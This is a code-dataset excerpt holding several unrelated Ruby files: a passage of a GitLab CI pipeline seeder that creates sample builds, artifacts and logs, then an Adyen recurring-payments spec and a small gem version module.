    # NOTE(review): duplicate of the 'rspec:windows 2 3' entry above — looks
    # unintended; confirm before removing.
    { name: 'rspec:windows 2 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    # NOTE(review): uses :status_event where sibling entries use :status —
    # confirm which key the model expects.
    { name: 'rspec:osx', stage: 'test', status_event: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'spinach:linux', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'spinach:osx', stage: 'test', status: :failed, allow_failure: true,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    # deploy stage
    { name: 'staging', stage: 'deploy', environment: 'staging', status_event: :success,
      options: { environment: { action: 'start', on_stop: 'stop staging' } },
      queued_at: 7.hour.ago, started_at: 6.hour.ago, finished_at: 4.hour.ago },
    { name: 'stop staging', stage: 'deploy', environment: 'staging',
      when: 'manual', status: :skipped },
    { name: 'production', stage: 'deploy', environment: 'production',
      when: 'manual', status: :skipped },
    # notify stage
    { name: 'slack', stage: 'notify', when: 'manual', status: :created },
  ]
  # Jobs reported by an external CI system, created as generic commit statuses.
  EXTERNAL_JOBS = [
    { name: 'jenkins', stage: 'test', status: :success,
      queued_at: 7.hour.ago, started_at: 6.hour.ago, finished_at: 4.hour.ago },
  ]
  def initialize(project)
    @project = project
  end
  # Creates every BUILDS/EXTERNAL_JOBS entry on each seeded pipeline,
  # printing '.' per pipeline and 'F' when a record fails validation; always
  # refreshes the pipeline's duration and status afterwards.
  def seed!
    pipelines.each do |pipeline|
      begin
        BUILDS.each { |opts| build_create!(pipeline, opts) }
        EXTERNAL_JOBS.each { |opts| commit_status_create!(pipeline, opts) }
        print '.'
      rescue ActiveRecord::RecordInvalid
        print 'F'
      ensure
        pipeline.update_duration
        pipeline.update_status
      end
    end
  end
  private
  def pipelines
    create_master_pipelines + create_merge_request_pipelines
  end
  # Pipelines for the last 4 commits on master. Best-effort: the bare rescue
  # swallows any error (e.g. empty repository) and returns [].
  def create_master_pipelines
    @project.repository.commits('master', limit: 4).map do |commit|
      create_pipeline!(@project, 'master', commit)
    end
  rescue
    []
  end
  # Pipelines for the last 4 commits of the first 3 merge requests; also
  # best-effort via a bare rescue returning [].
  def create_merge_request_pipelines
    pipelines = @project.merge_requests.first(3).map do |merge_request|
      project = merge_request.source_project
      branch = merge_request.source_branch
      merge_request.commits.last(4).map do |commit|
        create_pipeline!(project, branch, commit)
      end
    end
    pipelines.flatten
  rescue
    []
  end
  def create_pipeline!(project, ref, commit)
    project.pipelines.create(sha: commit.id, ref: ref, source: :push)
  end
  # Creates one Ci::Build from the template opts, then attaches artifacts,
  # log and environment to the persisted record.
  def build_create!(pipeline, opts = {})
    attributes = job_attributes(pipeline, opts)
      .merge(commands: '$ build command')
    Ci::Build.create!(attributes).tap do |build|
      # We need to set build trace and artifacts after saving a build
      # (id required), that is why we need `#tap` method instead of passing
      # block directly to `Ci::Build#create!`.
      setup_artifacts(build)
      setup_build_log(build)
      build.project.environments.
        find_or_create_by(name: build.expanded_environment_name)
      build.save
    end
  end
  # Attaches the fixture artifacts archive + metadata to build/test jobs only.
  def setup_artifacts(build)
    return unless %w[build test].include?(build.stage)
    artifacts_cache_file(artifacts_archive_path) do |file|
      build.artifacts_file = file
    end
    artifacts_cache_file(artifacts_metadata_path) do |file|
      build.artifacts_metadata = file
    end
  end
  # Fills the trace with lorem text for jobs in a started/finished state.
  def setup_build_log(build)
    if %w(running success failed).include?(build.status)
      build.trace.set(FFaker::Lorem.paragraphs(6).join("\n\n"))
    end
  end
  def commit_status_create!(pipeline, opts = {})
    attributes = job_attributes(pipeline, opts)
    GenericCommitStatus.create!(attributes)
  end
  # Base attribute hash shared by builds and commit statuses; entries from
  # opts override the defaults.
  def job_attributes(pipeline, opts)
    { name: 'test build', stage: 'test', stage_idx: stage_index(opts[:stage]),
      ref: pipeline.ref, tag: false, user: build_user, project: @project, pipeline: pipeline,
      created_at: Time.now, updated_at: Time.now
    }.merge(opts)
  end
  def build_user
    @project.team.users.sample
  end
  # NOTE(review): appears unused within this class — confirm before removal.
  def build_status
    Ci::Build::AVAILABLE_STATUSES.sample
  end
  # Maps a stage name to its index in STAGES; unknown/nil stages map to 0.
  def stage_index(stage)
    STAGES.index(stage) || 0
  end
  def artifacts_archive_path
    Rails.root + 'spec/fixtures/ci_build_artifacts.zip'
  end
  def artifacts_metadata_path
    Rails.root + 'spec/fixtures/ci_build_artifacts_metadata.gz'
  end
  # Copies the fixture to a per-project cache path (prefix 'ci_' replaced by
  # "p<id>_") and yields an open handle to it.
  def artifacts_cache_file(file_path)
    cache_path = file_path.to_s.gsub('ci_', "p#{@project.id}_")
    FileUtils.copy(file_path, cache_path)
    File.open(cache_path) do |file|
      yield file
    end
  end
end
# Seed pipelines for five random projects. NOTE(review): Seeder.quiet
# presumably suppresses callbacks/log noise during seeding — defined
# elsewhere; confirm.
Gitlab::Seeder.quiet do
  Project.all.sample(5).each do |project|
    project_builds = Gitlab::Seeder::Pipelines.new(project)
    project_builds.seed!
  end
end
| 31.878947 | 93 | 0.666832 |
6ad6212198dd2ab7b6f7c4b496db49849e847240 | 573 | require "spec_helper"
require_relative "../lib/adyen/errors"
# Dynamically generated request specs for the Adyen recurring service.
RSpec.describe AdyenOfficial::Payments, service: "recurring service" do
  # client instance to be used in dynamically generated tests
  client = create_client(:basic)
  # methods / values to test for
  # format is defined in spec_helper
  # Each entry appears to be [method, response key, expected value] —
  # confirm against generate_tests in spec_helper.
  test_sets = [
    ["list_recurring_details", "creationDate", "2017-03-01T11:53:11+01:00"],
    ["disable", "response", "[detail-successfully-disabled]"],
    ["store_token", "result", "Success"]
  ]
  # NOTE(review): describe targets Payments but the tests run against
  # client.recurring — confirm the described class is intentional.
  generate_tests(client, "Recurring", test_sets, client.recurring)
end
| 31.833333 | 76 | 0.720768 |
5d35246c26474bd916f8847833282ea4f6bf739b | 42 | module Mkswapfile
VERSION = "0.1.1"
end
| 10.5 | 19 | 0.690476 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.